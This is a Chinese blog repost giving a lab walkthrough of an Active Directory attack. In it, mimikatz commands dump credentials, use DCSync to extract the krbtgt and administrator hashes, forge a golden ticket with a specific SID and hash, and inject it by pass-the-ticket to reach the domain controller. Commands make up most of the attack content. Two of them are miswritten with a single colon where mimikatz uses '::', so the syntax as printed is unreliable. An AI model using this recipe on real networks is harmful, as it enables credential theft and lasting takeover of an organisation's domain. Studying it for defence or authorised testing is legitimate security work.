域渗透之通过DCSync获取权限并制作黄金票据 - 代码天地

域渗透之通过DCSync获取权限并制作黄金票据

其他 2019-03-02 23:51:26 阅读次数: 0

环境背景

账号：
- admin 没有域管权限
- admin02 有域管权限
- administrator 有域管权限
模拟渗透过程：

利用任意方法已经登录到client1（Windows 7），在client1上获取到了admin02的权限，进行DCSync获取krbtgt的hash，制作黄金票据，并远程IPC访问域控Windows Server 2012

登录Client1抓取域管凭证

尝试dcsync

尝试获取域管权限

尝试在本机上与mimikatz抓取这个组内的成员的hash

privilege::debug
sekurlsa::logonpasswords

切换到admin02执行DCSync

lsadump:dcsync /user:krbtgt /domain:sec.com
lsadump:dcsync /user:administrator /domain:sec.com

制作使用黄金票据

kerberos::golden /user:administrator /domain:sec.com /sid:s-1-5-21-2824519120-46247909-3994855717-500 /krbtgt:251ebdd7727334d9ade0415bf79d255a /ticket:super.ticket
kerberos:ptt super.ticket

猜你喜欢

转载自www.cnblogs.com/KevinGeorge/p/10463527.html

域渗透之通过DCSync获取权限并制作黄金票据

后渗透——域权限维持之利用黄金票据与白银票据获取域控权限

后渗透——域权限维持之利用黄金票据与白银票据获取域控权限

域渗透之（黄金票据利用）

黄金票据和白银票据获取域控权限

域渗透之黄金票据大法本地实验

域渗透-DCSync

域渗透DCSync利用

域渗透——哈希传递、黄金票据

黄金票据的制作与使用

域渗透之金票据学习

域渗透之（白银票据利用）

权限维持-黄金票据

域渗透之票据传递攻击（pass the ticket，ptt）

内网渗透之——域渗透中利用ms-14-068漏洞进行票据伪装获取域管账号密码

票据传递之黄金票据

利用非约束性委派+Spooler打印机服务制作黄金票据攻击域控

内网渗透(六十三)之滥用DCSync

内网渗透(七十五)之域权限维持之DCShadow

内网渗透之——域渗透里常用的域控权限维持方法

内网渗透之域渗透

伪造TGT黄金票据

伪造黄金票据（转）

内网渗透(七十二)之域权限维持之伪造域控

Kerberos域安全系列（26）-DCSync

黄金票据和白银票据

网络安全——使用Kerberos渗透测试域控服务器并获取权限

windows权限维持—黄金白银票据&隐藏用户&远控&RustDesk&GotoHttp

内网渗透(七十七)之域权限维持之ACL滥用（中）

内网渗透(七十六)之域权限维持之ACL滥用（上）

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

更多

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)